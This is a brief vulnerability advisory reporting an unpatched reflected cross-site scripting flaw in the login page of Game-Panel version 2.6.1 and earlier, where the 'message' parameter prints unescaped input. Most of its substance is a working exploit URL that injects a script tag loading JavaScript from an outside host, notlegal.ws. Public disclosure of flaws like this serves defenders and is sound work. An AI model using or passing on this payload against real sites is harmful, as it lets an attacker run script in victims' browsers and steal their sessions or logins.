——–summary software: Game-Panel vendors website: http://game-panel.com versions: <= 2.6.1 class: remote status: unpatched exploit: available solution: not available discovered by: sycko risk level: medium ——– description game-panel uses a global variable to print out error messages on their login page allowing execution of javascript ——– exploit(s) http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E ——– credit author(s): retard, jim, and sycko email: retard@30gigs.com